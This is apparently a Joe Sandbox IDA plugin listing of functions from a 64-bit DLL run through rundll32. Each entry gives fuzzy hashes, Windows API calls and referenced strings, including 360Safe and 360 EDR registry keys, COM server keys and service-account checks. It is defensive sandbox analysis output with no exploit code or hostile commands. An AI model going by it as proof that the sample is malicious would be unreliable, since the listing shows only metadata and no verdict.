Opcode ID: 75acf276f5303c209b0e6b56f5e71fa6dc54d5f9daca34d9052b038fe3a01ebd
Instruction ID: 85df055bf9425c6c0da70963d94a526d831783e1f19dc8973dcfbc1a34099653
Opcode Fuzzy Hash: 75acf276f5303c209b0e6b56f5e71fa6dc54d5f9daca34d9052b038fe3a01ebd
Instruction Fuzzy Hash: B2818032301B8896EBA6DF21ED403D933A5FB497D4F548125EA5A0BBA4DF38D768C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180066428 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 103registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 0000000180066475
RegQueryValueExW.ADVAPI32 ref: 00000001800664BA
RegCloseKey.ADVAPI32 ref: 00000001800664D7
RegOpenKeyExW.ADVAPI32 ref: 00000001800664FE
memset.MSVCRT ref: 0000000180066519
RegQueryValueExW.ADVAPI32 ref: 0000000180066556
RegCloseKey.ADVAPI32 ref: 000000018006656C
PathAppendW.SHLWAPI ref: 000000018006657E
PathFileExistsW.SHLWAPI ref: 0000000180066589

Part of subcall function 0000000180065F9C: GetModuleHandleW.KERNEL32 ref: 0000000180065FBE
Part of subcall function 0000000180065F9C: memset.MSVCRT ref: 0000000180065FD4

GetProcAddress.KERNEL32 ref: 00000001800665AF
FreeLibrary.KERNEL32 ref: 00000001800665C3
FreeLibrary.KERNEL32 ref: 00000001800665D0
RegCloseKey.ADVAPI32 ref: 00000001800665DD

Strings

Init, xrefs: 00000001800665A5
\entclient\EntSvcCall_x64.dll, xrefs: 0000000180066572
Path, xrefs: 0000000180066547
SOFTWARE\360Safe\360Ent, xrefs: 0000000180066467
ServiceCall, xrefs: 00000001800664AF
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe, xrefs: 00000001800664F0

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Close$FreeLibraryOpenPathQueryValuememset$AddressAppendExistsFileHandleModuleProc
String ID: Init$Path$SOFTWARE\360Safe\360Ent$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe$ServiceCall$\entclient\EntSvcCall_x64.dll
API String ID: 1498439332-702965266
Opcode ID: 7287dc7089829755e66462901955348d5673694c8cc533bc2c05e2a633cd80c9
Instruction ID: 4281fb2f7f8363f35efb0fd70a638a071d20137889dcc292f685ea46b841f4e2
Opcode Fuzzy Hash: 7287dc7089829755e66462901955348d5673694c8cc533bc2c05e2a633cd80c9
Instruction Fuzzy Hash: 74513E32614B4996EF918F20E8557DA73A0F7897C4F549116BA9F06A79EF38C74CCB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180024CD4 Relevance: 32.0, APIs: 6, Strings: 12, Instructions: 490COMMON

Download Yara Rule

APIs

wcsstr.MSVCRT ref: 0000000180024D2B
PathFindExtensionW.SHLWAPI ref: 0000000180024D45
wcsstr.MSVCRT ref: 0000000180024D81
_wcsicmp.MSVCRT ref: 0000000180024DBC
wcschr.MSVCRT ref: 0000000180025254
_wtoi.MSVCRT ref: 0000000180025266

Strings

LocalServer, xrefs: 0000000180025539, 0000000180025558
LocalServer32, xrefs: 0000000180025573, 0000000180025592
Server, xrefs: 00000001800255AD, 00000001800255CC
InprocServer32, xrefs: 000000018002598A, 00000001800259A9
InprocServer, xrefs: 0000000180025950, 000000018002596F
gfffffff, xrefs: 0000000180025519
\\?\, xrefs: 0000000180025ABC
InprocHandler32, xrefs: 00000001800259FE, 0000000180025A1D
gfffffff, xrefs: 0000000180025A39
ShellExecute, xrefs: 000000018002568D
CLSID, xrefs: 0000000180025490
InprocHandler, xrefs: 00000001800259C4, 00000001800259E3

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: wcsstr$ExtensionFindPath_wcsicmp_wtoiwcschr
String ID: CLSID$InprocHandler$InprocHandler32$InprocServer$InprocServer32$LocalServer$LocalServer32$Server$ShellExecute$\\?\$gfffffff$gfffffff
API String ID: 3861457700-2318594275
Opcode ID: 1a717cbbda8cc80c3c9297c878bbbc669d8a73a80a9fe28ac877bfe538569426
Instruction ID: f5eaf3cd70d8a4233fc3eb4f5baabc932733307175318797ea3a634ab2d80fd0
Opcode Fuzzy Hash: 1a717cbbda8cc80c3c9297c878bbbc669d8a73a80a9fe28ac877bfe538569426
Instruction Fuzzy Hash: 3A12B672301A4886EB92DF39C8407DD23A1FB85BE5F44D211EA6D576E9EF78CA48C704

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180056DE8 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 118COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,00000000), ref: 0000000180056E2B
_wcsicmp.MSVCRT ref: 0000000180056E62
_wcsicmp.MSVCRT ref: 0000000180056E79
memset.MSVCRT ref: 0000000180056E93
SHGetValueW.SHLWAPI ref: 0000000180056ECC
memset.MSVCRT ref: 0000000180056EF4
memset.MSVCRT ref: 0000000180056F1B

Part of subcall function 0000000180056534: memset.MSVCRT ref: 0000000180056572
Part of subcall function 0000000180056534: GetModuleFileNameW.KERNEL32 ref: 0000000180056589
Part of subcall function 0000000180056534: PathAppendW.SHLWAPI ref: 00000001800565AD
Part of subcall function 0000000180056534: _wcsicmp.MSVCRT ref: 00000001800565C8
Part of subcall function 0000000180056534: PathAppendW.SHLWAPI ref: 00000001800565DE

SHGetValueW.SHLWAPI ref: 0000000180056F5D
LeaveCriticalSection.KERNEL32 ref: 0000000180056F91

Strings

SOFTWARE\Wow6432Node\360SD, xrefs: 0000000180056EBB
pid, xrefs: 0000000180056EB4
SOFTWARE\Wow6432Node\360EntSecurity, xrefs: 0000000180056F41
PCInfo, xrefs: 0000000180056E6F
360ExtHost, xrefs: 0000000180056E58
ipartner, xrefs: 0000000180056F03
Partner, xrefs: 0000000180056F2F
SOFTWARE\Wow6432Node\360EDRSensor, xrefs: 0000000180056F38
SOFTWARE\Wow6432Node\360Safe\Coop, xrefs: 0000000180056F0A

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: memset$_wcsicmp$AppendCriticalPathSectionValue$EnterFileLeaveModuleName
String ID: 360ExtHost$PCInfo$Partner$SOFTWARE\Wow6432Node\360EDRSensor$SOFTWARE\Wow6432Node\360EntSecurity$SOFTWARE\Wow6432Node\360SD$SOFTWARE\Wow6432Node\360Safe\Coop$ipartner$pid
API String ID: 3226263223-3142758636
Opcode ID: 628566989c82da212381fb3148179b37bd681cc2eaf5be604a1b5c7982e4b541
Instruction ID: 9533c192c26b347b8b9675f8c4be5ba0e6f9fe9a3a5b632a6bc0f6ba07ebb3e1
Opcode Fuzzy Hash: 628566989c82da212381fb3148179b37bd681cc2eaf5be604a1b5c7982e4b541
Instruction Fuzzy Hash: CF419D31A00A0C94FB96DB22A8403D963A4F74DBE4F909225FD28677A5EF39C74EC340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180044F64 Relevance: 30.1, APIs: 9, Strings: 8, Instructions: 320COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

_cwprintf_s_l.LIBCMT ref: 00000001800450AA
_cwprintf_s_l.LIBCMT ref: 00000001800450C2
_cwprintf_s_l.LIBCMT ref: 00000001800450D8

Part of subcall function 0000000180017B44: memset.MSVCRT ref: 0000000180017B79
Part of subcall function 0000000180017B44: memset.MSVCRT ref: 0000000180017BCB
Part of subcall function 0000000180017B44: InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,?,?,?,0000000180006327), ref: 0000000180017BD6
Part of subcall function 0000000180017B44: GetLastError.KERNEL32(?,?,?,?,?,?,0000000180006327), ref: 0000000180017BE0
Part of subcall function 0000000180017B44: GetTickCount.KERNEL32 ref: 0000000180017BF8

Part of subcall function 000000018000D19C: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000D22A
Part of subcall function 000000018000D19C: memset.MSVCRT ref: 000000018000D270
Part of subcall function 000000018000D19C: memmove.MSVCRT ref: 000000018000D282
Part of subcall function 000000018000D19C: ??3@YAXPEAX@Z.MSVCRT ref: 000000018000D2B8

memmove.MSVCRT ref: 000000018004518F
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800451AE
??3@YAXPEAX@Z.MSVCRT ref: 00000001800451EB
GetTickCount.KERNEL32 ref: 0000000180045357
srand.MSVCRT ref: 000000018004535F
rand.MSVCRT ref: 0000000180045365

Strings

DomainQuery, xrefs: 00000001800450AF
com, xrefs: 000000018004504A
0=%s, xrefs: 00000001800450CC
[%s], xrefs: 0000000180045051, 00000001800450B6
mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%s, xrefs: 000000018004509E
360safe, xrefs: 0000000180045086
router:1, xrefs: 000000018004506E
router, xrefs: 000000018004507A

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Count_cwprintf_s_lmemset$??3@Tickmemmove$??2@CriticalErrorHeapInitializeLastProcessSectionSpinrandsrand
String ID: 0=%s$360safe$DomainQuery$[%s]$com$mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%s$router$router:1
API String ID: 1789426470-3446598425
Opcode ID: 61786b1980ef7039dc4211af90e47e9a0e74f34993d56612bf85e9d061f4368c
Instruction ID: 6d6f9855de1d8c5247af129e1c82467daf937bd8777ee679c9f2b2c93b700a4d
Opcode Fuzzy Hash: 61786b1980ef7039dc4211af90e47e9a0e74f34993d56612bf85e9d061f4368c
Instruction Fuzzy Hash: D8D19132204F4882EB419B69D8803DE73A0F789BE5F108226BAAD477E5DF78C649C704

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004C034 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 000000018004C074
OpenProcessToken.ADVAPI32 ref: 000000018004C085
GetTokenInformation.ADVAPI32 ref: 000000018004C0B8
GetLastError.KERNEL32 ref: 000000018004C0C8
GlobalAlloc.KERNEL32 ref: 000000018004C0E3
GetTokenInformation.ADVAPI32 ref: 000000018004C115
LookupAccountSidW.ADVAPI32 ref: 000000018004C156
CloseHandle.KERNEL32 ref: 000000018004C175
GlobalFree.KERNEL32 ref: 000000018004C183
wcscmp.MSVCRT ref: 000000018004C19D
wcscmp.MSVCRT ref: 000000018004C1B4
wcscmp.MSVCRT ref: 000000018004C1CB
wcscmp.MSVCRT ref: 000000018004C1E2

Strings

LOCAL SERVICE, xrefs: 000000018004C1BD
NETWORK SERVICE, xrefs: 000000018004C1D4
NT AUTHORITY, xrefs: 000000018004C193
SYSTEM, xrefs: 000000018004C1A6

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: wcscmp$Token$GlobalInformationProcess$AccountAllocCloseCurrentErrorFreeHandleLastLookupOpen
String ID: LOCAL SERVICE$NETWORK SERVICE$NT AUTHORITY$SYSTEM
API String ID: 3141378966-199577007
Opcode ID: 8d6976f719ecb46038f7faa6d62441ad30095ab4bbf55d005c38fee77e3359ad
Instruction ID: cee3605f7c7adaec53412b2e982fb153fefebb873c81ca2b5be3308eddbb09f0
Opcode Fuzzy Hash: 8d6976f719ecb46038f7faa6d62441ad30095ab4bbf55d005c38fee77e3359ad
Instruction Fuzzy Hash: F2517C32604B4986EBE28F14E8847DA73A5F78D7D8F518125EA5D436A4DF39C70DCB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003AC1C Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 107COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018003AC67
GetModuleHandleW.KERNEL32 ref: 000000018003AC73
GetModuleFileNameW.KERNEL32 ref: 000000018003AC8E
memset.MSVCRT ref: 000000018003ACAE
GetModuleFileNameW.KERNEL32 ref: 000000018003ACC4
PathAppendW.SHLWAPI ref: 000000018003ACEA
PathAppendW.SHLWAPI ref: 000000018003ACFC
GetFileAttributesW.KERNEL32 ref: 000000018003AD07
PathAppendW.SHLWAPI ref: 000000018003AD36
PathAppendW.SHLWAPI ref: 000000018003AD48

Strings

bapi64.dll, xrefs: 000000018003AC6C, 000000018003ACF0, 000000018003AD3C
..\, xrefs: 000000018003AD2A
..\deepscan\, xrefs: 000000018003ACDE

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AppendPath$FileModule$Namememset$AttributesHandle
String ID: ..\$..\deepscan\$bapi64.dll
API String ID: 2144934147-2390674060
Opcode ID: 9d5beebac642680a506550c8be48c190e39914ceb82cb04c52bb84f1375e2870
Instruction ID: 18b05e09174244348b6cef7f8f2b1baf28e5037f203e247325d4c6a64b139c1b
Opcode Fuzzy Hash: 9d5beebac642680a506550c8be48c190e39914ceb82cb04c52bb84f1375e2870
Instruction Fuzzy Hash: 6F514B32614A8882FBA3DB20EC443DA3361F78D7C9F859125E59A47AA5EF2DC74DC740

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004872C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 318COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

_cwprintf_s_l.LIBCMT ref: 0000000180048845
_cwprintf_s_l.LIBCMT ref: 000000018004885A
IsBadStringPtrW.KERNEL32 ref: 0000000180048873
_cwprintf_s_l.LIBCMT ref: 000000018004888F
memmove.MSVCRT ref: 0000000180048946
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800489B5
??3@YAXPEAX@Z.MSVCRT ref: 00000001800489F2
GetTickCount.KERNEL32 ref: 0000000180048B0C
srand.MSVCRT ref: 0000000180048B14
rand.MSVCRT ref: 0000000180048B1A

Strings

com, xrefs: 00000001800487E7
%d=%s, xrefs: 0000000180048883
mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%spid=%s, xrefs: 0000000180048839
[%s], xrefs: 00000001800487EE, 000000018004884E

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: _cwprintf_s_l$??3@CountHeapProcessStringTickmemmoverandsrand
String ID: %d=%s$[%s]$com$mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%spid=%s
API String ID: 2740332460-2247268028
Opcode ID: 48d86df3b5eac7e439a35ff4fd84f198e4b1e974b1358ce155bcc0297089f372
Instruction ID: 80426b886386f52412969e15ba132e6e65bce95777886caa6ce0aa64614bcf94
Opcode Fuzzy Hash: 48d86df3b5eac7e439a35ff4fd84f198e4b1e974b1358ce155bcc0297089f372
Instruction Fuzzy Hash: 5FD1C172305F4886EB51DB29E88039E73A0FB88BE8F158625AE5D077A5DF78C549C704

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004F018 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 116COMMON

Download Yara Rule

APIs

wcsstr.MSVCRT ref: 000000018004F06D
_wcsicmp.MSVCRT ref: 000000018004F102
_wcsnicmp.MSVCRT ref: 000000018004F11C
_wcsicmp.MSVCRT ref: 000000018004F14D
_wcsnicmp.MSVCRT ref: 000000018004F167
_wcsicmp.MSVCRT ref: 000000018004F17B
_wcsnicmp.MSVCRT ref: 000000018004F195

Strings

Software\Classes\Wow6432Node\, xrefs: 000000018004F15D
Software\Wow6432Node, xrefs: 000000018004F171
Software\Wow6432Node\, xrefs: 000000018004F18B
Software\Classes\Wow6432Node, xrefs: 000000018004F143
wow6432node, xrefs: 000000018004F066
Wow6432Node\, xrefs: 000000018004F112
Wow6432Node, xrefs: 000000018004F0F8

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: _wcsicmp_wcsnicmp$wcsstr
String ID: Software\Classes\Wow6432Node$Software\Classes\Wow6432Node\$Software\Wow6432Node$Software\Wow6432Node\$Wow6432Node$Wow6432Node\$wow6432node
API String ID: 4199785700-2224805171
Opcode ID: bc25291bcc814f054e7e10840494f54f48fde9230fe93c8f0d5c0c6b2b3ad0be
Instruction ID: 173969ce7e51924b4f06bf421c606f91b3afd6de77e358442d966ae2f37bd097
Opcode Fuzzy Hash: bc25291bcc814f054e7e10840494f54f48fde9230fe93c8f0d5c0c6b2b3ad0be
Instruction Fuzzy Hash: 55517371710E48C1EBA6DB29D8843B923A1B789BE4F46C215EA39437E4DF68CB4CC745

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180014138 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018001417F
GetModuleFileNameW.KERNEL32 ref: 0000000180014196
PathAppendW.SHLWAPI ref: 00000001800141A8

Part of subcall function 0000000180065EE4: PathFileExistsW.SHLWAPI ref: 0000000180065F00
Part of subcall function 0000000180065EE4: EnterCriticalSection.KERNEL32 ref: 0000000180065F2A
Part of subcall function 0000000180065EE4: LeaveCriticalSection.KERNEL32 ref: 0000000180065F73

memset.MSVCRT ref: 00000001800141E1
GetModuleFileNameW.KERNEL32 ref: 00000001800141F8
PathAppendW.SHLWAPI ref: 000000018001420A
PathFileExistsW.SHLWAPI ref: 0000000180014215
memset.MSVCRT ref: 0000000180014229
GetModuleFileNameW.KERNEL32 ref: 0000000180014240
PathAppendW.SHLWAPI ref: 0000000180014252
PathFileExistsW.SHLWAPI ref: 000000018001425D

Strings

..\360sd.exe, xrefs: 00000001800141FE
..\safemon\360Cactus.tpi, xrefs: 000000018001419C
..\360SkinMgr.exe, xrefs: 0000000180014246

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: FilePath$AppendExistsModuleNamememset$CriticalSection$EnterLeave
String ID: ..\360SkinMgr.exe$..\360sd.exe$..\safemon\360Cactus.tpi
API String ID: 2738204422-1657815065
Opcode ID: 78597d9bd975c32090d8355579ef8ffe821f8875940c9f43dd2c1350df723c28
Instruction ID: 05d3995d6e5afe1b7f2ff7eb98ba3dbe6d41cc5d548c72c66593806649a32fef
Opcode Fuzzy Hash: 78597d9bd975c32090d8355579ef8ffe821f8875940c9f43dd2c1350df723c28
Instruction Fuzzy Hash: 0E417131614A8D82EBE69B21EC953EA27A4F79D784F80C055F99E476A5DF2DC30DCB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004C3C8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 187COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018004C433
GetModuleFileNameW.KERNEL32 ref: 000000018004C44D
PathAppendW.SHLWAPI ref: 000000018004C462

Strings

..\360bps.dat, xrefs: 000000018004C453
//lsp/fnp, xrefs: 000000018004C66D
//lsp/fnpw, xrefs: 000000018004C685

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AppendFileModuleNamePathmemset
String ID: ..\360bps.dat$//lsp/fnp$//lsp/fnpw
API String ID: 1620117007-629564897
Opcode ID: 8b88fd5d987282aa7e8cbcbc9338ad7a6d43f93b19f4f5ae7e83081502dc9fb0
Instruction ID: 9751cd454638bcc7bf23e097769634142843b259acdcdf6531404e40a8ce2858
Opcode Fuzzy Hash: 8b88fd5d987282aa7e8cbcbc9338ad7a6d43f93b19f4f5ae7e83081502dc9fb0
Instruction Fuzzy Hash: FF918431209B8882EAD2CF15E8847DDB7A4F7887D4F418116EA9943BA9DF7CC64DCB01

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E07C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 163filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 000000018000E0E1
GetFileSizeEx.KERNEL32 ref: 000000018000E0FB
malloc.MSVCRT ref: 000000018000E127
memset.MSVCRT ref: 000000018000E142
ReadFile.KERNEL32 ref: 000000018000E15C

Part of subcall function 000000018000DDA4: EnterCriticalSection.KERNEL32 ref: 000000018000DDEB
Part of subcall function 000000018000DDA4: LeaveCriticalSection.KERNEL32 ref: 000000018000DE34

malloc.MSVCRT ref: 000000018000E22B
memset.MSVCRT ref: 000000018000E247

Part of subcall function 000000018000DC14: EnterCriticalSection.KERNEL32 ref: 000000018000DC5D
Part of subcall function 000000018000DC14: LeaveCriticalSection.KERNEL32 ref: 000000018000DCA6

GetFileTime.KERNEL32 ref: 000000018000E281
CloseHandle.KERNEL32 ref: 000000018000E28F
free.MSVCRT ref: 000000018000E29C
free.MSVCRT ref: 000000018000E2AF

Strings

D063, xrefs: 000000018000E176
|, xrefs: 000000018000E18C

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalFileSection$EnterLeavefreemallocmemset$CloseCreateHandleReadSizeTime
String ID: D063$|
API String ID: 1613485820-3743183194
Opcode ID: 180749bbb112b904ef6176165a202792b4826eb4bf0b5cc93a95b31eeb2a1677
Instruction ID: 1c0486e52071ce2fa8a0c36d95268ac158065e3f2ce4ac4886627ad722c994ab
Opcode Fuzzy Hash: 180749bbb112b904ef6176165a202792b4826eb4bf0b5cc93a95b31eeb2a1677
Instruction Fuzzy Hash: 0A61AF327016588AFBD6CFA5E9457A873E9B70DBD8F008025EE0957BA8DF34C649C711

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180056C84 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 93COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180056CB4
SHGetValueW.SHLWAPI(?,?,000000018004825D,?,?,?,?,?,?,?,000000018000644F), ref: 0000000180056D05

Part of subcall function 00000001800562D0: memset.MSVCRT ref: 000000018005630E
Part of subcall function 00000001800562D0: GetModuleFileNameW.KERNEL32 ref: 0000000180056325
Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 0000000180056349
Part of subcall function 00000001800562D0: _wcsicmp.MSVCRT ref: 0000000180056364
Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 000000018005637A

memset.MSVCRT ref: 0000000180056D30
memset.MSVCRT ref: 0000000180056D5A
SHGetValueW.SHLWAPI(?,?,000000018004825D,?,?,?,?,?,?,?,000000018000644F), ref: 0000000180056D9C

Part of subcall function 0000000180056534: memset.MSVCRT ref: 0000000180056572
Part of subcall function 0000000180056534: GetModuleFileNameW.KERNEL32 ref: 0000000180056589
